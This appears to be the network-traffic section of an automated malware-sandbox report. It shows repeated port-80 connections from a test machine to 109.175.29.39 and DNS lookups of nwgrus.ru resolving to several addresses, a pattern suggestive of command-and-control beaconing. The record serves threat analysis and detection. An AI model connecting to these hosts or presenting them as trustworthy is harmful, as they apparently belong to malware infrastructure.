                                      Oct 14, 2024 10:02:46.112363100 CEST4974580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:46.117500067 CEST8049745109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:46.117583036 CEST4974580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:46.120929956 CEST4974580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:46.120958090 CEST4974580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:46.126019955 CEST8049745109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:46.126077890 CEST8049745109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:47.032917976 CEST8049745109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:47.033529997 CEST8049745109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:47.033837080 CEST4974580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:47.034369946 CEST4974580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:47.039154053 CEST8049745109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:47.041243076 CEST4974680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:47.046165943 CEST8049746109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:47.046246052 CEST4974680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:47.046334982 CEST4974680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:47.046350002 CEST4974680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:47.051202059 CEST8049746109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:47.051282883 CEST8049746109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:47.852401018 CEST8049746109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:47.853426933 CEST8049746109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:47.853497028 CEST4974680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:47.853559971 CEST4974680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:47.856220961 CEST4974780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:47.858429909 CEST8049746109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:47.861282110 CEST8049747109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:47.861371040 CEST4974780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:47.861527920 CEST4974780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:47.861558914 CEST4974780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:47.866297960 CEST8049747109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:47.866441965 CEST8049747109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:48.657077074 CEST8049747109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:48.657628059 CEST8049747109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:48.657828093 CEST4974780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:48.657828093 CEST4974780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:48.660762072 CEST4974880192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:48.663192034 CEST8049747109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:48.665842056 CEST8049748109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:48.665921926 CEST4974880192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:48.666071892 CEST4974880192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:48.666121006 CEST4974880192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:48.671154976 CEST8049748109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:48.671247005 CEST8049748109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:49.459602118 CEST8049748109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:49.462537050 CEST8049748109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:49.462698936 CEST4974880192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:49.462762117 CEST4974880192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:49.465981007 CEST4974980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:49.467551947 CEST8049748109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:49.470832109 CEST8049749109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:49.470932007 CEST4974980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:49.471048117 CEST4974980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:49.471084118 CEST4974980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:49.475805998 CEST8049749109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:49.475956917 CEST8049749109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:50.282727003 CEST8049749109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:50.282918930 CEST8049749109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:50.282988071 CEST4974980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:50.283077002 CEST4974980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:50.286218882 CEST4975080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:50.287947893 CEST8049749109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:50.291177988 CEST8049750109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:50.291249037 CEST4975080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:50.291349888 CEST4975080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:50.291383028 CEST4975080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:50.296133041 CEST8049750109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:50.296276093 CEST8049750109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:51.089848995 CEST8049750109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:51.090111971 CEST8049750109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:51.090176105 CEST4975080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:51.090214968 CEST4975080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:51.093189955 CEST4975180192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:51.095118999 CEST8049750109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:51.098108053 CEST8049751109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:51.098185062 CEST4975180192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:51.098297119 CEST4975180192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:51.098311901 CEST4975180192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:51.103131056 CEST8049751109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:51.103230000 CEST8049751109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:51.895728111 CEST8049751109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:51.895889044 CEST8049751109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:51.895963907 CEST4975180192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:51.896034002 CEST4975180192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:51.901103020 CEST8049751109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:51.907500982 CEST4975280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:51.912595987 CEST8049752109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:51.912798882 CEST4975280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:51.912986994 CEST4975280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:51.913023949 CEST4975280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:51.917823076 CEST8049752109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:51.917936087 CEST8049752109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:52.777829885 CEST8049752109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:52.778400898 CEST8049752109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:52.778542042 CEST4975280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:52.778651953 CEST4975280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:52.781461954 CEST4975380192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:52.783560991 CEST8049752109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:52.786422014 CEST8049753109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:52.786501884 CEST4975380192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:52.786597967 CEST4975380192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:52.786632061 CEST4975380192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:52.791441917 CEST8049753109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:52.792155981 CEST8049753109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:53.594877958 CEST8049753109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:53.594919920 CEST8049753109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:53.595038891 CEST4975380192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:53.595194101 CEST4975380192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:53.597706079 CEST4975480192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:53.600116968 CEST8049753109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:53.602665901 CEST8049754109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:53.602766991 CEST4975480192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:53.602880955 CEST4975480192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:53.602914095 CEST4975480192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:53.607790947 CEST8049754109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:53.607940912 CEST8049754109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:54.432265043 CEST8049754109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:54.432451010 CEST8049754109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:54.432534933 CEST4975480192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:54.432605982 CEST4975480192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:54.435277939 CEST4975580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:54.437434912 CEST8049754109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:54.440274954 CEST8049755109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:54.440362930 CEST4975580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:54.440512896 CEST4975580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:54.440557003 CEST4975580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:54.445312977 CEST8049755109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:54.445611000 CEST8049755109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:55.356287003 CEST8049755109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:55.356589079 CEST8049755109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:55.356666088 CEST4975580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:55.356862068 CEST4975580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:55.359462976 CEST4975680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:55.361706018 CEST8049755109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:55.364439964 CEST8049756109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:55.364516973 CEST4975680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:55.364646912 CEST4975680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:55.364675999 CEST4975680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:55.369587898 CEST8049756109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:55.369961977 CEST8049756109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:56.160439014 CEST8049756109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:56.161005974 CEST8049756109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:56.161079884 CEST4975680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:56.161132097 CEST4975680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:56.163661957 CEST4975780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:56.166066885 CEST8049756109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:56.168560028 CEST8049757109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:56.168764114 CEST4975780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:56.168869972 CEST4975780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:56.168869972 CEST4975780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:56.173732042 CEST8049757109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:56.173873901 CEST8049757109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:56.967535973 CEST8049757109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:56.967680931 CEST8049757109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:56.967829943 CEST4975780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:56.967871904 CEST4975780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:56.970235109 CEST4975880192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:56.972856998 CEST8049757109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:56.975229979 CEST8049758109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:56.975310087 CEST4975880192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:56.975419044 CEST4975880192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:56.977700949 CEST4975880192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:56.980389118 CEST8049758109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:56.982736111 CEST8049758109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:57.801300049 CEST8049758109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:57.802153111 CEST8049758109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:57.802217960 CEST4975880192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:57.802557945 CEST4975880192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:57.804518938 CEST4975980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:57.807507038 CEST8049758109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:57.809566021 CEST8049759109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:57.809920073 CEST4975980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:57.810257912 CEST4975980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:57.810257912 CEST4975980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:57.815251112 CEST8049759109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:57.815341949 CEST8049759109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:58.602148056 CEST8049759109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:58.603007078 CEST8049759109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:58.603168964 CEST4975980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:58.603260994 CEST4975980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:58.606524944 CEST4976080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:58.608335972 CEST8049759109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:58.611499071 CEST8049760109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:58.611591101 CEST4976080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:58.611738920 CEST4976080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:58.611777067 CEST4976080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:58.616776943 CEST8049760109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:58.616811991 CEST8049760109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:59.500734091 CEST8049760109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:59.500781059 CEST8049760109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:59.501084089 CEST4976080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:59.501351118 CEST4976080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:59.504414082 CEST4976180192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:59.506295919 CEST8049760109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:59.509593964 CEST8049761109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:59.509684086 CEST4976180192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:59.509779930 CEST4976180192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:59.509802103 CEST4976180192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:02:59.514758110 CEST8049761109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:02:59.514786959 CEST8049761109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:00.324894905 CEST8049761109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:00.324990034 CEST8049761109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:00.325140953 CEST4976180192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:00.325211048 CEST4976180192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:00.327958107 CEST4976280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:00.330169916 CEST8049761109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:00.332890034 CEST8049762109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:00.332969904 CEST4976280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:00.333209991 CEST4976280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:00.333230972 CEST4976280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:00.337985992 CEST8049762109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:00.338177919 CEST8049762109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:01.241354942 CEST8049762109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:01.241477013 CEST8049762109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:01.241528034 CEST4976280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:01.244995117 CEST4976280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:01.249847889 CEST8049762109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:01.398951054 CEST4976380192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:01.404083014 CEST8049763109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:01.404159069 CEST4976380192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:01.404306889 CEST4976380192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:01.404340982 CEST4976380192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:01.409140110 CEST8049763109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:01.409153938 CEST8049763109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:02.205260992 CEST8049763109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:02.205349922 CEST8049763109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:02.205411911 CEST4976380192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:02.205519915 CEST4976380192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:02.210397959 CEST8049763109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:02.214718103 CEST4976480192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:02.219717979 CEST8049764109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:02.219791889 CEST4976480192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:02.219935894 CEST4976480192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:02.219971895 CEST4976480192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:02.224771023 CEST8049764109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:02.224922895 CEST8049764109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:03.013564110 CEST8049764109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:03.013725996 CEST8049764109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:03.013839006 CEST4976480192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:03.014036894 CEST4976480192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:03.016741037 CEST4976580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:03.019205093 CEST8049764109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:03.021811008 CEST8049765109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:03.021902084 CEST4976580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:03.022027969 CEST4976580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:03.022027969 CEST4976580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:03.026832104 CEST8049765109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:03.027013063 CEST8049765109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:03.815471888 CEST8049765109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:03.817471981 CEST8049765109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:03.820532084 CEST4976580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:03.855640888 CEST4976580192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:03.860541105 CEST8049765109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:03.937942028 CEST4976680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:03.943032980 CEST8049766109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:03.943108082 CEST4976680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:03.945909977 CEST4976680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:03.945910931 CEST4976680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:03.950735092 CEST8049766109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:03.950916052 CEST8049766109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:04.822065115 CEST8049766109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:04.822968960 CEST8049766109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:04.823195934 CEST4976680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:04.823195934 CEST4976680192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:04.826041937 CEST4976780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:04.828200102 CEST8049766109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:04.831000090 CEST8049767109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:04.831084967 CEST4976780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:04.831216097 CEST4976780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:04.831258059 CEST4976780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:04.836023092 CEST8049767109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:04.836163044 CEST8049767109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:05.614105940 CEST8049767109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:05.614420891 CEST8049767109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:05.614746094 CEST4976780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:05.614870071 CEST4976780192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:05.617141962 CEST4976980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:05.619806051 CEST8049767109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:05.622423887 CEST8049769109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:05.622641087 CEST4976980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:05.622786999 CEST4976980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:05.622817039 CEST4976980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:05.627614021 CEST8049769109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:05.627756119 CEST8049769109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:06.417629004 CEST8049769109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:06.417754889 CEST8049769109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:06.417804956 CEST4976980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:06.417855024 CEST4976980192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:06.422831059 CEST8049769109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:06.456892967 CEST4977080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:06.461868048 CEST8049770109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:06.461940050 CEST4977080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:06.462102890 CEST4977080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:06.462138891 CEST4977080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:06.467046022 CEST8049770109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:06.467075109 CEST8049770109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:07.311100960 CEST8049770109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:07.311444044 CEST8049770109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:07.311723948 CEST4977080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:07.311794043 CEST4977080192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:07.315206051 CEST4977280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:07.316705942 CEST8049770109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:07.320128918 CEST8049772109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:07.320271969 CEST4977280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:07.320449114 CEST4977280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:07.320485115 CEST4977280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:07.325234890 CEST8049772109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:07.325284958 CEST8049772109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:08.127748966 CEST8049772109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:08.128184080 CEST8049772109.175.29.39192.168.2.4
                                      Oct 14, 2024 10:03:08.128601074 CEST4977280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:08.128680944 CEST4977280192.168.2.4109.175.29.39
                                      Oct 14, 2024 10:03:08.133577108 CEST8049772109.175.29.39192.168.2.4
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 14, 2024 10:02:36.086679935 CEST5186553192.168.2.41.1.1.1
                                      Oct 14, 2024 10:02:37.077652931 CEST5186553192.168.2.41.1.1.1
                                      Oct 14, 2024 10:02:38.146615982 CEST5186553192.168.2.41.1.1.1
                                      Oct 14, 2024 10:02:38.444628954 CEST53518651.1.1.1192.168.2.4
                                      Oct 14, 2024 10:02:38.444684029 CEST53518651.1.1.1192.168.2.4
                                      Oct 14, 2024 10:02:38.444715023 CEST53518651.1.1.1192.168.2.4
                                      Oct 14, 2024 10:03:46.790268898 CEST4929253192.168.2.41.1.1.1
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Oct 14, 2024 10:02:36.086679935 CEST192.168.2.41.1.1.10xfe89Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:37.077652931 CEST192.168.2.41.1.1.10xfe89Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.146615982 CEST192.168.2.41.1.1.10xfe89Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:03:46.790268898 CEST192.168.2.41.1.1.10x10e6Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Oct 14, 2024 10:02:38.444628954 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444628954 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru212.112.110.243A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444628954 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444628954 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444628954 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444628954 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru190.187.52.42A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444628954 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru63.143.98.185A (IP address)IN (0x0001)false
